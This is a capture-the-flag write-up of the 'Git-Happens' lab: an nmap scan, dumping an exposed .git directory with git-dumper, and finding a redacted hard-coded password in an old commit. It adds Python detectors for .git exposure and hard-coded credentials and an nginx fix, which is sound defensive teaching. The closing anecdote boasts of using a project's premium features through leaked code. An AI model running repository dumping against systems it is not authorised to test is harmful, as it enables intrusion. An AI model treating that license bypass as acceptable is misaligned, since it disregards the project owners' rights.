
# Git-Happens

### Target Details

IP Address: 10.10.49.172

### Scan Services

* Run nmap scan

```bash
$ nmap -sCV -Pn -oN nmap.txt [TARGET_IP]
$ cat nmap.txt
Nmap scan report for [TARGET_IP]
Host is up (0.40s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
|_http-server-header: nginx/1.14.0 (Ubuntu)
| http-git: 
|   [TARGET_IP]:80/.git/
|     Git repository found!
|_    Repository description: Unnamed repository; edit this file 'description' to name the...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 14 22:04:47 2023 -- 1 IP address (1 host up) scanned in 118.95 seconds
```

* Services

| Service | PORT | Comments                                    |
| ------- | ---- | ------------------------------------------- |
| HTTP    | 80   | exposed .git directory with listing enabled |

_Figure: Exposed .git directory_
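The same check that nmap's `http-git` script performed above, written as an audit a defender can run against hosts they operate. This is an added example, not code from the original writeup: it decides exposure from the shape of the `/.git/HEAD` and `/.git/config` bodies rather than from a bare 200 status, so a catch-all route that answers every path with 200 is not reported as an exposed repository. The host name `host.example`, the fetcher abstraction and all response bodies are constructed for the demo.

```python
"""Detect an exposed .git directory from the shape of its HTTP responses.

Added example, not code from the original writeup. `host.example` and the
response tables below are constructed; `http_fetch` shows how to wire the
check to a live server you operate.
"""
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, Tuple

Fetcher = Callable[[str], Tuple[int, str]]  # url -> (status code, body)

# A real .git/HEAD is a symbolic ref or a bare 40-hex object id, nothing else.
HEAD_RE = re.compile(r"^(?:ref: refs/\S+|[0-9a-f]{40})$")
# A real .git/config starts with a [core] section.
CONFIG_RE = re.compile(r"^\s*\[core\]", re.MULTILINE)


def check_git_exposure(base_url: str, fetch: Fetcher) -> Dict[str, bool]:
    """Return which repository artefacts are readable below base_url/.git/.

    Only a body that looks like the real file counts: a catch-all page that
    answers every path with 200 must not be reported as an exposed repo.
    """
    findings = {"head": False, "config": False, "listing": False}

    status, body = fetch(base_url + "/.git/HEAD")
    findings["head"] = status == 200 and bool(HEAD_RE.match(body.strip()))

    status, body = fetch(base_url + "/.git/config")
    findings["config"] = status == 200 and bool(CONFIG_RE.search(body))

    status, body = fetch(base_url + "/.git/")
    # An autoindex listing names the standard repository entries.
    findings["listing"] = status == 200 and "objects" in body and "refs" in body

    findings["exposed"] = findings["head"] or findings["config"]
    return findings


def http_fetch(url: str, timeout: float = 5.0) -> Tuple[int, str]:
    """Live fetcher for auditing servers you operate (not used by the demo)."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read(4096).decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        return exc.code, ""
    except urllib.error.URLError:
        return 0, ""


def make_fetch(responses: Dict[str, Tuple[int, str]]) -> Fetcher:
    """Offline fetcher backed by a table of constructed responses."""
    return lambda url: responses.get(url, (404, "Not Found"))


BASE = "http://host.example"  # constructed host name

# Constructed responses from a host that serves .git with autoindex on.
EXPOSED = {
    BASE + "/.git/HEAD": (200, "ref: refs/heads/master\n"),
    BASE + "/.git/config": (200, "[core]\n\trepositoryformatversion = 0\n\tbare = false\n"),
    BASE + "/.git/": (200, '<a href="HEAD">HEAD</a> <a href="objects/">objects/</a> <a href="refs/">refs/</a>'),
}

# Constructed responses from a host whose catch-all route answers 200 to everything.
CATCH_ALL = {
    BASE + "/.git/HEAD": (200, "<html><title>Super Awesome Site!</title></html>"),
    BASE + "/.git/config": (200, "<html><title>Super Awesome Site!</title></html>"),
    BASE + "/.git/": (200, "<html><title>Super Awesome Site!</title></html>"),
}

# Constructed responses from a host that blocks the path outright.
BLOCKED = {BASE + "/.git/HEAD": (403, "Forbidden")}

if __name__ == "__main__":
    for name, table in (("exposed", EXPOSED), ("catch-all", CATCH_ALL), ("blocked", BLOCKED)):
        print(name, check_git_exposure(BASE, make_fetch(table)))
```

Run it as a script to see the three verdicts; to audit a real host you operate, call `check_git_exposure("https://your-host", http_fetch)`. The fix on the server side is to refuse the path altogether, for example an nginx `location ~ /\.git { deny all; }` block, and to deploy from a build artefact rather than a checked-out clone so the `.git` directory never reaches the web root.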

### Clone git directory to local machine

* Install the git-dumper Python tool

```bash
pip install git-dumper
```

* Create a directory for the repo and change into it

```bash
mkdir git-repo && cd git-repo
```

* Dump the repository files

```bash
$ git-dumper http://10.10.49.172/.git/ .
[-] Testing http://10.10.49.172/.git/HEAD [200]
[-] Testing http://10.10.49.172/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://10.10.49.172/.git/ [200]
[-] Fetching http://10.10.49.172/.gitignore [404]
[-] http://10.10.49.172/.gitignore responded with status code 404
[-] Fetching http://10.10.49.172/.git/description [200]
[-] Fetching http://10.10.49.172/.git/index [200]
[-] Fetching http://10.10.49.172/.git/hooks/ [200]
[-] Fetching http://10.10.49.172/.git/refs/ [200]
[-] Fetching http://10.10.49.172/.git/config [200]
[-] Fetching http://10.10.49.172/.git/branches/ [200]
[-] Fetching http://10.10.49.172/.git/HEAD [200]
....
[-] Fetching http://10.10.49.172/.git/logs/refs/heads/master [200]
[-] Running git checkout .
Updated 7 paths from the index
```

### Looking Through Commits

* Check commit logs

```bash
$ git log
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Thu Jul 23 22:22:16 2020 +0000

    Update .gitlab-ci.yml

commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Fri Jul 24 00:21:25 2020 +0200

    add gitlab-ci config to build docker file.

....


commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:17:43 2020 +0200

    Made the login page, boss!

commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Mon Jul 20 20:46:28 2020 +0000

    Initial commit
```

* Found the commit in which the login page was created. Commit hash: 395e087334d613d5e423cdf8f7be27196a360459
* Check out that commit so the working tree reflects the login page as first committed

```bash
git checkout 395e087334d613d5e423cdf8f7be27196a360459
```

* List directory files

```bash
$ ls
README.md      css            dashboard.html index.html
```

* We might find hard-coded credentials in the HTML page.

```bash
$ cat index.html

....
    <script>
      function login() {
        let form = document.getElementById("login-form");
        console.log(form.elements);
        let username = form.elements["username"].value;
        let password = form.elements["password"].value;
        if (
          username === "admin" &&
          password === "{{REDACTED}}"
        ) {
          document.cookie = "login=1";
          window.location.href = "/dashboard.html";
        } else {
          document.getElementById("error").innerHTML =
            "INVALID USERNAME OR PASSWORD!";
        }
      }
    </script>
  </body>
</html> 
```

* We've found the hard-coded password in index.html. Submit the password as the flag.
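The manual `cat index.html` review above scales badly once a repository has more than a handful of files and commits. The following is an added example, not code from the original writeup: a small scanner that flags string literals compared against or assigned to credential-looking identifiers in HTML and JavaScript, which is exactly the pattern the `login()` function above exhibits. The sample file contents are constructed to mirror that snippet (with the password left as the `{{REDACTED}}` placeholder), and `scan_tree` and the regex are my own.

```python
"""Flag hard-coded credentials in client-side HTML/JS.

Added example, not code from the original writeup. SAMPLE is a constructed
file modelled on the index.html shown in the writeup.
"""
import re
from pathlib import Path
from typing import Iterator, List, Tuple

# A credential-like identifier compared (==, ===, !=, !==) against or assigned
# (=, :) to a string literal. Reads via form.elements["password"] do not match
# because no literal follows the identifier.
CRED_RE = re.compile(
    r"""\b(password|passwd|pwd|secret|api[_-]?key|token|user(?:name)?)\b"""
    r"""\s*(?:===?|!==?|[:=])\s*["'`]([^"'`]+)["'`]""",
    re.IGNORECASE,
)


def find_hardcoded_credentials(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, identifier, literal) for every hit in text."""
    hits: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for match in CRED_RE.finditer(line):
            hits.append((lineno, match.group(1), match.group(2)))
    return hits


def scan_tree(root: Path, suffixes=(".html", ".htm", ".js")) -> Iterator[Tuple[Path, int, str, str]]:
    """Walk a checked-out tree and yield hits from every HTML/JS file."""
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            for lineno, key, literal in find_hardcoded_credentials(path.read_text(errors="replace")):
                yield path, lineno, key, literal


# Constructed sample modelled on the writeup's index.html (password redacted).
SAMPLE = """<script>
  function login() {
    let form = document.getElementById("login-form");
    let username = form.elements["username"].value;
    let password = form.elements["password"].value;
    if (
      username === "admin" &&
      password === "{{REDACTED}}"
    ) {
      document.cookie = "login=1";
      window.location.href = "/dashboard.html";
    }
  }
</script>
"""

if __name__ == "__main__":
    import tempfile

    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "index.html").write_text(SAMPLE)
        for path, lineno, key, literal in scan_tree(Path(tmp)):
            print(f"{path.name}:{lineno}: {key} checked against literal {literal!r}")
```

The scanner only sees the current working tree, so to cover history the way the writeup does, run it once per commit of interest (after `git checkout <hash>`), or feed it the output of `git show <hash>:index.html`. A hit is a finding regardless of whether the literal is still valid: anything committed is recoverable from history even after a later commit removes it.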

### Real World Analogy

From one open source project: the developers mistakenly committed a paid-services code block to their community edition git repo. I was able to reverse engineer the code block and avail myself of those premium services :wink: by making changes to the community edition codebase.

### Conclusion

That was FUN!!

* If you're gonna hard code credentials on the client side, there is always someone who's gonna break the code.
* The `.git` directory shouldn't be accessible to anyone. A minor server misconfiguration like this hands an attacker an attack vector into your infra/apps.
